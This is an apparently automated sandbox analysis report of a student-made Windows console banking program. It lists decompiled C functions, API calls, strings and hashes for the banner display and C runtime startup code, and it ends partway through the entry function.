                                                                      0x00be22a1
                                                                      0x00be22a6
                                                                      0x00be22ab
                                                                      0x00be22b7
                                                                      0x00be22bc
                                                                      0x00be22c1
                                                                      0x00be22cd
                                                                      0x00be22d2
                                                                      0x00be22e2

                                                                      APIs
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE139D
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13DB
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13FC
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1470
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1493
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE21FF
                                                                      • _wprintf.LIBCMT ref: 00BE2232
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wprintf.LIBCMT ref: 00BE224A
                                                                      • _wprintf.LIBCMT ref: 00BE227D
                                                                      • _wprintf.LIBCMT ref: 00BE2295
                                                                      • _wprintf.LIBCMT ref: 00BE22AB
                                                                      • _wprintf.LIBCMT ref: 00BE22C1
                                                                      • _wprintf.LIBCMT ref: 00BE22D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                                      • String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
                                                                      • API String ID: 1778593935-2888666035
                                                                      • Opcode ID: 9c1522695654ab23e7f81f15102a43427ce169f31b1a6074af1375f489b141f3
                                                                      • Instruction ID: 5758903f799b420800a9b20caefa0008138f9cc5df8a39480563da264661640a
                                                                      • Opcode Fuzzy Hash: 9c1522695654ab23e7f81f15102a43427ce169f31b1a6074af1375f489b141f3
                                                                      • Instruction Fuzzy Hash: BA214D71AD438AB6F6247BDA5C03F6D32E05B11B44F2045F4B7053E2C2EBF1660862AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 66%
                                                                      			E00BE20E0(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                      				intOrPtr _v8;
                                                                      				void* __ebp;
                                                                      				void* _t9;
                                                                      				intOrPtr _t16;
                                                                      				void* _t20;
                                                                      				void* _t24;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      				void* _t31;
                                                                      				void* _t37;
                                                                      
                                                                      				_t37 = __fp0;
                                                                      				_t23 = __esi;
                                                                      				_t22 = __edi;
                                                                      				E00BE1380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                                      				E00BE12B0(0x19, 1);
                                                                      				_push("Banking Management //");
                                                                      				E00BE715C(_t20, __edi, __esi, __eflags);
                                                                      				E00BE12B0(5, 3);
                                                                      				_t9 = E00BE8230(0xc02ee4, "Admin");
                                                                      				_t26 = _t24 + 0xc;
                                                                      				if(_t9 == 0) {
                                                                      					 *0xc02240 = 1;
                                                                      				}
                                                                      				_t34 =  *0xc02240;
                                                                      				if( *0xc02240 == 0) {
                                                                      					_push(0xc02ee4);
                                                                      					_push("Current User : %s");
                                                                      					E00BE715C(_t20, _t22, _t23, __eflags);
                                                                      					_t27 = _t26 + 8;
                                                                      				} else {
                                                                      					_push("Current User : Admin");
                                                                      					E00BE715C(_t20, _t22, _t23, _t34);
                                                                      					_t27 = _t26 + 4;
                                                                      				}
                                                                      				_push("\t\t\t\tDate : ");
                                                                      				E00BE715C(_t20, _t22, _t23, _t34);
                                                                      				E00BE834B(_t34, 0xc02f40);
                                                                      				_push(0xc02f40);
                                                                      				E00BE16A0(_t22, _t23, _t37);
                                                                      				_push(0xc02f40);
                                                                      				_push("%s");
                                                                      				E00BE715C(_t20, _t22, _t23, _t34);
                                                                      				E00BE834B(_t34, 0xc02f40);
                                                                      				_t31 = _t27 + 0x14;
                                                                      				_t16 = E00BE12B0(1, 5);
                                                                      				_v8 = 0;
                                                                      				while(1) {
                                                                      					_t35 = _v8 - 0x4e;
                                                                      					if(_v8 >= 0x4e) {
                                                                      						break;
                                                                      					}
                                                                      					_push(0xc4);
                                                                      					_push("%c");
                                                                      					E00BE715C(_t20, _t22, _t23, _t35);
                                                                      					_t31 = _t31 + 8;
                                                                      					_t16 = _v8 + 1;
                                                                      					_v8 = _t16;
                                                                      				}
                                                                      				return _t16;
                                                                      			}













                                                                      0x00be20e0
                                                                      0x00be20e0
                                                                      0x00be20e0
                                                                      0x00be20ec
                                                                      0x00be20f5
                                                                      0x00be20fa
                                                                      0x00be20ff
                                                                      0x00be210b
                                                                      0x00be211a
                                                                      0x00be211f
                                                                      0x00be2124
                                                                      0x00be2126
                                                                      0x00be2126
                                                                      0x00be2130
                                                                      0x00be2137
                                                                      0x00be2148
                                                                      0x00be214d
                                                                      0x00be2152
                                                                      0x00be2157
                                                                      0x00be2139
                                                                      0x00be2139
                                                                      0x00be213e
                                                                      0x00be2143
                                                                      0x00be2143
                                                                      0x00be215a
                                                                      0x00be215f
                                                                      0x00be216c
                                                                      0x00be2174
                                                                      0x00be2179
                                                                      0x00be217e
                                                                      0x00be2183
                                                                      0x00be2188
                                                                      0x00be2195
                                                                      0x00be219a
                                                                      0x00be21a1
                                                                      0x00be21a6
                                                                      0x00be21b8
                                                                      0x00be21b8
                                                                      0x00be21bc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be21be
                                                                      0x00be21c3
                                                                      0x00be21c8
                                                                      0x00be21cd
                                                                      0x00be21b2
                                                                      0x00be21b5
                                                                      0x00be21b5
                                                                      0x00be21d5

                                                                      APIs
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE139D
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13DB
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13FC
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1470
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1493
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE20FF
                                                                      • _wprintf.LIBCMT ref: 00BE213E
                                                                      • _wprintf.LIBCMT ref: 00BE2152
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wprintf.LIBCMT ref: 00BE215F
                                                                      • __wstrtime.LIBCMT ref: 00BE216C
                                                                      • _wprintf.LIBCMT ref: 00BE2188
                                                                      • __wstrtime.LIBCMT ref: 00BE2195
                                                                      • _wprintf.LIBCMT ref: 00BE21C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                                      • String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
                                                                      • API String ID: 3817360410-644830535
                                                                      • Opcode ID: 3e68fafc65ca2aaf26337d5102ddfc126d2a7b193465bf89c5821b9573fb59e5
                                                                      • Instruction ID: 504a7c2ebaf74a2f7782dc2197ba6b98a3e0af884df793ab490f711db5a88ebf
                                                                      • Opcode Fuzzy Hash: 3e68fafc65ca2aaf26337d5102ddfc126d2a7b193465bf89c5821b9573fb59e5
                                                                      • Instruction Fuzzy Hash: 05115EB1BD438576E6147BD29C07F4D31A45B11B4AF2601F4FB08392C2EFF12618826B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00BEA5E2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed int _t81;
                                                                      				void* _t86;
                                                                      				long _t90;
                                                                      				signed int _t94;
                                                                      				signed int _t98;
                                                                      				signed int _t99;
                                                                      				signed char _t103;
                                                                      				signed int _t105;
                                                                      				intOrPtr _t106;
                                                                      				intOrPtr* _t109;
                                                                      				signed char _t111;
                                                                      				long _t119;
                                                                      				signed int _t130;
                                                                      				signed int _t134;
                                                                      				signed int _t135;
                                                                      				signed int _t138;
                                                                      				void** _t139;
                                                                      				signed int _t141;
                                                                      				void* _t142;
                                                                      				signed int _t143;
                                                                      				void** _t147;
                                                                      				signed int _t149;
                                                                      				void* _t150;
                                                                      				signed int _t154;
                                                                      				void* _t155;
                                                                      				void* _t160;
                                                                      
                                                                      				_push(0x64);
                                                                      				_push(0xbfd8c0);
                                                                      				E00BE9160(__ebx, __edi, __esi);
                                                                      				E00BEBE5F(0xb);
                                                                      				_t130 = 0;
                                                                      				 *(_t155 - 4) = 0;
                                                                      				_t160 =  *0xc02f60 - _t130; // 0x0
                                                                      				if(_t160 == 0) {
                                                                      					_push(0x40);
                                                                      					_t141 = 0x20;
                                                                      					_push(_t141);
                                                                      					_t81 = E00BEC55B();
                                                                      					_t134 = _t81;
                                                                      					 *(_t155 - 0x24) = _t134;
                                                                      					__eflags = _t134;
                                                                      					if(_t134 != 0) {
                                                                      						 *0xc02f60 = _t81;
                                                                      						 *0xc02f5c = _t141;
                                                                      						while(1) {
                                                                      							__eflags = _t134 - _t81 + 0x800;
                                                                      							if(_t134 >= _t81 + 0x800) {
                                                                      								break;
                                                                      							}
                                                                      							 *((short*)(_t134 + 4)) = 0xa00;
                                                                      							 *_t134 =  *_t134 | 0xffffffff;
                                                                      							 *(_t134 + 8) = _t130;
                                                                      							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
                                                                      							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
                                                                      							 *((short*)(_t134 + 0x25)) = 0xa0a;
                                                                      							 *(_t134 + 0x38) = _t130;
                                                                      							 *(_t134 + 0x34) = _t130;
                                                                      							_t134 = _t134 + 0x40;
                                                                      							 *(_t155 - 0x24) = _t134;
                                                                      							_t81 =  *0xc02f60; // 0x0
                                                                      						}
                                                                      						GetStartupInfoW(_t155 - 0x74);
                                                                      						__eflags =  *((short*)(_t155 - 0x42));
                                                                      						if( *((short*)(_t155 - 0x42)) == 0) {
                                                                      							while(1) {
                                                                      								L31:
                                                                      								 *(_t155 - 0x2c) = _t130;
                                                                      								__eflags = _t130 - 3;
                                                                      								if(_t130 >= 3) {
                                                                      									break;
                                                                      								}
                                                                      								_t147 = (_t130 << 6) +  *0xc02f60;
                                                                      								 *(_t155 - 0x24) = _t147;
                                                                      								__eflags =  *_t147 - 0xffffffff;
                                                                      								if( *_t147 == 0xffffffff) {
                                                                      									L35:
                                                                      									_t147[1] = 0x81;
                                                                      									__eflags = _t130;
                                                                      									if(_t130 != 0) {
                                                                      										_t66 = _t130 - 1; // -1
                                                                      										asm("sbb eax, eax");
                                                                      										_t90 =  ~_t66 + 0xfffffff5;
                                                                      										__eflags = _t90;
                                                                      									} else {
                                                                      										_t90 = 0xfffffff6;
                                                                      									}
                                                                      									_t142 = GetStdHandle(_t90);
                                                                      									__eflags = _t142 - 0xffffffff;
                                                                      									if(_t142 == 0xffffffff) {
                                                                      										L47:
                                                                      										_t147[1] = _t147[1] | 0x00000040;
                                                                      										 *_t147 = 0xfffffffe;
                                                                      										_t94 =  *0xc03064;
                                                                      										__eflags = _t94;
                                                                      										if(_t94 != 0) {
                                                                      											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                                                      										}
                                                                      										goto L49;
                                                                      									} else {
                                                                      										__eflags = _t142;
                                                                      										if(_t142 == 0) {
                                                                      											goto L47;
                                                                      										}
                                                                      										_t98 = GetFileType(_t142);
                                                                      										__eflags = _t98;
                                                                      										if(_t98 == 0) {
                                                                      											goto L47;
                                                                      										}
                                                                      										 *_t147 = _t142;
                                                                      										_t99 = _t98 & 0x000000ff;
                                                                      										__eflags = _t99 - 2;
                                                                      										if(_t99 != 2) {
                                                                      											__eflags = _t99 - 3;
                                                                      											if(_t99 != 3) {
                                                                      												L46:
                                                                      												_t70 =  &(_t147[3]); // -12595028
                                                                      												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                                                      												_t147[2] = _t147[2] + 1;
                                                                      												L49:
                                                                      												_t130 = _t130 + 1;
                                                                      												continue;
                                                                      											}
                                                                      											_t103 = _t147[1] | 0x00000008;
                                                                      											__eflags = _t103;
                                                                      											L45:
                                                                      											_t147[1] = _t103;
                                                                      											goto L46;
                                                                      										}
                                                                      										_t103 = _t147[1] | 0x00000040;
                                                                      										goto L45;
                                                                      									}
                                                                      								}
                                                                      								__eflags =  *_t147 - 0xfffffffe;
                                                                      								if( *_t147 == 0xfffffffe) {
                                                                      									goto L35;
                                                                      								}
                                                                      								_t147[1] = _t147[1] | 0x00000080;
                                                                      								goto L49;
                                                                      							}
                                                                      							 *(_t155 - 4) = 0xfffffffe;
                                                                      							E00BEA8A6();
                                                                      							L2:
                                                                      							_t86 = 1;
                                                                      							L3:
                                                                      							return E00BE91A5(_t86);
                                                                      						}
                                                                      						_t105 =  *(_t155 - 0x40);
                                                                      						__eflags = _t105;
                                                                      						if(_t105 == 0) {
                                                                      							goto L31;
                                                                      						}
                                                                      						_t135 =  *_t105;
                                                                      						 *(_t155 - 0x1c) = _t135;
                                                                      						_t106 = _t105 + 4;
                                                                      						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                                                      						 *(_t155 - 0x20) = _t106 + _t135;
                                                                      						__eflags = _t135 - 0x800;
                                                                      						if(_t135 >= 0x800) {
                                                                      							_t135 = 0x800;
                                                                      							 *(_t155 - 0x1c) = 0x800;
                                                                      						}
                                                                      						_t149 = 1;
                                                                      						__eflags = 1;
                                                                      						 *(_t155 - 0x30) = 1;
                                                                      						while(1) {
                                                                      							__eflags =  *0xc02f5c - _t135; // 0x0
                                                                      							if(__eflags >= 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t138 = E00BEC55B(_t141, 0x40);
                                                                      							 *(_t155 - 0x24) = _t138;
                                                                      							__eflags = _t138;
                                                                      							if(_t138 != 0) {
                                                                      								0xc02f60[_t149] = _t138;
                                                                      								 *0xc02f5c =  *0xc02f5c + _t141;
                                                                      								__eflags =  *0xc02f5c;
                                                                      								while(1) {
                                                                      									__eflags = _t138 - 0xc02f60[_t149] + 0x800;
                                                                      									if(_t138 >= 0xc02f60[_t149] + 0x800) {
                                                                      										break;
                                                                      									}
                                                                      									 *((short*)(_t138 + 4)) = 0xa00;
                                                                      									 *_t138 =  *_t138 | 0xffffffff;
                                                                      									 *(_t138 + 8) = _t130;
                                                                      									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                                                      									 *((short*)(_t138 + 0x25)) = 0xa0a;
                                                                      									 *(_t138 + 0x38) = _t130;
                                                                      									 *(_t138 + 0x34) = _t130;
                                                                      									_t138 = _t138 + 0x40;
                                                                      									 *(_t155 - 0x24) = _t138;
                                                                      								}
                                                                      								_t149 = _t149 + 1;
                                                                      								 *(_t155 - 0x30) = _t149;
                                                                      								_t135 =  *(_t155 - 0x1c);
                                                                      								continue;
                                                                      							}
                                                                      							_t135 =  *0xc02f5c; // 0x0
                                                                      							 *(_t155 - 0x1c) = _t135;
                                                                      							break;
                                                                      						}
                                                                      						_t143 = _t130;
                                                                      						 *(_t155 - 0x2c) = _t143;
                                                                      						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                                                      						_t139 =  *(_t155 - 0x20);
                                                                      						while(1) {
                                                                      							__eflags = _t143 - _t135;
                                                                      							if(_t143 >= _t135) {
                                                                      								goto L31;
                                                                      							}
                                                                      							_t150 =  *_t139;
                                                                      							__eflags = _t150 - 0xffffffff;
                                                                      							if(_t150 == 0xffffffff) {
                                                                      								L26:
                                                                      								_t143 = _t143 + 1;
                                                                      								 *(_t155 - 0x2c) = _t143;
                                                                      								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                                                      								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                                                      								_t139 =  &(_t139[1]);
                                                                      								 *(_t155 - 0x20) = _t139;
                                                                      								continue;
                                                                      							}
                                                                      							__eflags = _t150 - 0xfffffffe;
                                                                      							if(_t150 == 0xfffffffe) {
                                                                      								goto L26;
                                                                      							}
                                                                      							_t111 =  *_t109;
                                                                      							__eflags = _t111 & 0x00000001;
                                                                      							if((_t111 & 0x00000001) == 0) {
                                                                      								goto L26;
                                                                      							}
                                                                      							__eflags = _t111 & 0x00000008;
                                                                      							if((_t111 & 0x00000008) != 0) {
                                                                      								L24:
                                                                      								_t154 = ((_t143 & 0x0000001f) << 6) + 0xc02f60[_t143 >> 5];
                                                                      								 *(_t155 - 0x24) = _t154;
                                                                      								 *_t154 =  *_t139;
                                                                      								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                                                      								_t38 = _t154 + 0xc; // 0xd
                                                                      								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                                                      								_t39 = _t154 + 8;
                                                                      								 *_t39 =  *(_t154 + 8) + 1;
                                                                      								__eflags =  *_t39;
                                                                      								_t139 =  *(_t155 - 0x20);
                                                                      								L25:
                                                                      								_t135 =  *(_t155 - 0x1c);
                                                                      								goto L26;
                                                                      							}
                                                                      							_t119 = GetFileType(_t150);
                                                                      							_t139 =  *(_t155 - 0x20);
                                                                      							__eflags = _t119;
                                                                      							if(_t119 == 0) {
                                                                      								goto L25;
                                                                      							}
                                                                      							goto L24;
                                                                      						}
                                                                      						goto L31;
                                                                      					}
                                                                      					E00BE96F0(_t155, 0xc01380, _t155 - 0x10, 0xfffffffe);
                                                                      					_t86 = 0;
                                                                      					goto L3;
                                                                      				}
                                                                      				E00BE96F0(_t155, 0xc01380, _t155 - 0x10, 0xfffffffe);
                                                                      				goto L2;
                                                                      			}





























                                                                      0x00bea5e2
                                                                      0x00bea5e4
                                                                      0x00bea5e9
                                                                      0x00bea5f0
                                                                      0x00bea5f6
                                                                      0x00bea5f8
                                                                      0x00bea5fb
                                                                      0x00bea601
                                                                      0x00bea621
                                                                      0x00bea625
                                                                      0x00bea626
                                                                      0x00bea627
                                                                      0x00bea62e
                                                                      0x00bea630
                                                                      0x00bea633
                                                                      0x00bea635
                                                                      0x00bea64e
                                                                      0x00bea653
                                                                      0x00bea659
                                                                      0x00bea65e
                                                                      0x00bea660
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea662
                                                                      0x00bea668
                                                                      0x00bea66b
                                                                      0x00bea66e
                                                                      0x00bea677
                                                                      0x00bea67a
                                                                      0x00bea680
                                                                      0x00bea683
                                                                      0x00bea686
                                                                      0x00bea689
                                                                      0x00bea68c
                                                                      0x00bea68c
                                                                      0x00bea697
                                                                      0x00bea69d
                                                                      0x00bea6a2
                                                                      0x00bea7d1
                                                                      0x00bea7d1
                                                                      0x00bea7d1
                                                                      0x00bea7d4
                                                                      0x00bea7d7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea7e2
                                                                      0x00bea7e8
                                                                      0x00bea7eb
                                                                      0x00bea7ee
                                                                      0x00bea803
                                                                      0x00bea803
                                                                      0x00bea807
                                                                      0x00bea809
                                                                      0x00bea810
                                                                      0x00bea815
                                                                      0x00bea817
                                                                      0x00bea817
                                                                      0x00bea80b
                                                                      0x00bea80d
                                                                      0x00bea80d
                                                                      0x00bea821
                                                                      0x00bea823
                                                                      0x00bea826
                                                                      0x00bea86d
                                                                      0x00bea873
                                                                      0x00bea876
                                                                      0x00bea87c
                                                                      0x00bea881
                                                                      0x00bea883
                                                                      0x00bea888
                                                                      0x00bea888
                                                                      0x00000000
                                                                      0x00bea828
                                                                      0x00bea828
                                                                      0x00bea82a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea82d
                                                                      0x00bea833
                                                                      0x00bea835
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea837
                                                                      0x00bea839
                                                                      0x00bea83e
                                                                      0x00bea841
                                                                      0x00bea84b
                                                                      0x00bea84e
                                                                      0x00bea859
                                                                      0x00bea85e
                                                                      0x00bea862
                                                                      0x00bea868
                                                                      0x00bea88f
                                                                      0x00bea88f
                                                                      0x00000000
                                                                      0x00bea88f
                                                                      0x00bea854
                                                                      0x00bea854
                                                                      0x00bea856
                                                                      0x00bea856
                                                                      0x00000000
                                                                      0x00bea856
                                                                      0x00bea847
                                                                      0x00000000
                                                                      0x00bea847
                                                                      0x00bea826
                                                                      0x00bea7f0
                                                                      0x00bea7f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea7fb
                                                                      0x00000000
                                                                      0x00bea7fb
                                                                      0x00bea895
                                                                      0x00bea89c
                                                                      0x00bea616
                                                                      0x00bea618
                                                                      0x00bea619
                                                                      0x00bea61e
                                                                      0x00bea61e
                                                                      0x00bea6a8
                                                                      0x00bea6ab
                                                                      0x00bea6ad
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea6b3
                                                                      0x00bea6b5
                                                                      0x00bea6b8
                                                                      0x00bea6bb
                                                                      0x00bea6c0
                                                                      0x00bea6c8
                                                                      0x00bea6ca
                                                                      0x00bea6cc
                                                                      0x00bea6ce
                                                                      0x00bea6ce
                                                                      0x00bea6d3
                                                                      0x00bea6d3
                                                                      0x00bea6d4
                                                                      0x00bea6d7
                                                                      0x00bea6d7
                                                                      0x00bea6dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea6e9
                                                                      0x00bea6eb
                                                                      0x00bea6ee
                                                                      0x00bea6f0
                                                                      0x00bea784
                                                                      0x00bea78b
                                                                      0x00bea78b
                                                                      0x00bea791
                                                                      0x00bea79d
                                                                      0x00bea79f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea7a1
                                                                      0x00bea7a7
                                                                      0x00bea7aa
                                                                      0x00bea7ad
                                                                      0x00bea7b1
                                                                      0x00bea7b7
                                                                      0x00bea7ba
                                                                      0x00bea7bd
                                                                      0x00bea7c0
                                                                      0x00bea7c0
                                                                      0x00bea7c5
                                                                      0x00bea7c6
                                                                      0x00bea7c9
                                                                      0x00000000
                                                                      0x00bea7c9
                                                                      0x00bea6f6
                                                                      0x00bea6fc
                                                                      0x00000000
                                                                      0x00bea6fc
                                                                      0x00bea6ff
                                                                      0x00bea701
                                                                      0x00bea704
                                                                      0x00bea707
                                                                      0x00bea70a
                                                                      0x00bea70a
                                                                      0x00bea70c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea712
                                                                      0x00bea714
                                                                      0x00bea717
                                                                      0x00bea771
                                                                      0x00bea771
                                                                      0x00bea772
                                                                      0x00bea778
                                                                      0x00bea779
                                                                      0x00bea77c
                                                                      0x00bea77f
                                                                      0x00000000
                                                                      0x00bea77f
                                                                      0x00bea719
                                                                      0x00bea71c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea71e
                                                                      0x00bea720
                                                                      0x00bea722
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea724
                                                                      0x00bea726
                                                                      0x00bea736
                                                                      0x00bea743
                                                                      0x00bea74a
                                                                      0x00bea74f
                                                                      0x00bea756
                                                                      0x00bea75e
                                                                      0x00bea762
                                                                      0x00bea768
                                                                      0x00bea768
                                                                      0x00bea768
                                                                      0x00bea76b
                                                                      0x00bea76e
                                                                      0x00bea76e
                                                                      0x00000000
                                                                      0x00bea76e
                                                                      0x00bea729
                                                                      0x00bea72f
                                                                      0x00bea732
                                                                      0x00bea734
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea734
                                                                      0x00000000
                                                                      0x00bea70a
                                                                      0x00bea642
                                                                      0x00bea64a
                                                                      0x00000000
                                                                      0x00bea64a
                                                                      0x00bea60e
                                                                      0x00000000

                                                                      APIs
                                                                      • __lock.LIBCMT ref: 00BEA5F0
                                                                        • Part of subcall function 00BEBE5F: __mtinitlocknum.LIBCMT ref: 00BEBE71
                                                                        • Part of subcall function 00BEBE5F: EnterCriticalSection.KERNEL32(?,?,00BED668,0000000D,?,?,?,?,00BFDA28,00000008,00BED601,00000000,00000000,00BE8F04,00BF1E56,00000000), ref: 00BEBE8A
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00BEA60E
                                                                      • __calloc_crt.LIBCMT ref: 00BEA627
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00BEA642
                                                                      • GetStartupInfoW.KERNEL32(?,00BFD8C0,00000064), ref: 00BEA697
                                                                      • __calloc_crt.LIBCMT ref: 00BEA6E2
                                                                      • GetFileType.KERNEL32(00000001), ref: 00BEA729
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00BEA762
                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00BEA81B
                                                                      • GetFileType.KERNEL32(00000000), ref: 00BEA82D
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(-00C02F54,00000FA0), ref: 00BEA862
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
                                                                      • String ID:
                                                                      • API String ID: 1456538442-0
                                                                      • Opcode ID: e59f81bd4fba2a734a36d5be8ed6afa0306c709c66ab92e753f4ea962bba7ff8
                                                                      • Instruction ID: cb7bf10139586f362cb8ad2ad9968357172092888a5ba7c6000558f23e76255a
                                                                      • Opcode Fuzzy Hash: e59f81bd4fba2a734a36d5be8ed6afa0306c709c66ab92e753f4ea962bba7ff8
                                                                      • Instruction Fuzzy Hash: 8891D8719047958FDB14CFA9C8846ADBBF8FF05324B2442AED4A6A73D1DB34A803CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                      				intOrPtr _t17;
                                                                      				void* _t24;
                                                                      				void* _t25;
                                                                      				void* _t26;
                                                                      				signed int _t38;
                                                                      				void* _t40;
                                                                      				void* _t46;
                                                                      				signed int _t49;
                                                                      				void* _t51;
                                                                      				void* _t53;
                                                                      				void* _t60;
                                                                      
                                                                      				_t60 = __fp0;
                                                                      				_t47 = __edi;
                                                                      				_t46 = __edx;
                                                                      				E00BEFC48();
                                                                      				_push(0x14);
                                                                      				_push(0xbfd838);
                                                                      				E00BE9160(__ebx, __edi, __esi);
                                                                      				_t49 = E00BEC013() & 0x0000ffff;
                                                                      				E00BEFBFB(2);
                                                                      				_t53 =  *0xbe0000 - 0x5a4d; // 0x5a4d
                                                                      				if(_t53 == 0) {
                                                                      					_t17 =  *0xbe003c; // 0xf0
                                                                      					__eflags =  *((intOrPtr*)(_t17 + 0xbe0000)) - 0x4550;
                                                                      					if( *((intOrPtr*)(_t17 + 0xbe0000)) != 0x4550) {
                                                                      						goto L2;
                                                                      					} else {
                                                                      						__eflags =  *((intOrPtr*)(_t17 + 0xbe0018)) - 0x10b;
                                                                      						if( *((intOrPtr*)(_t17 + 0xbe0018)) != 0x10b) {
                                                                      							goto L2;
                                                                      						} else {
                                                                      							_t38 = 0;
                                                                      							__eflags =  *((intOrPtr*)(_t17 + 0xbe0074)) - 0xe;
                                                                      							if( *((intOrPtr*)(_t17 + 0xbe0074)) > 0xe) {
                                                                      								__eflags =  *(_t17 + 0xbe00e8);
                                                                      								_t6 =  *(_t17 + 0xbe00e8) != 0;
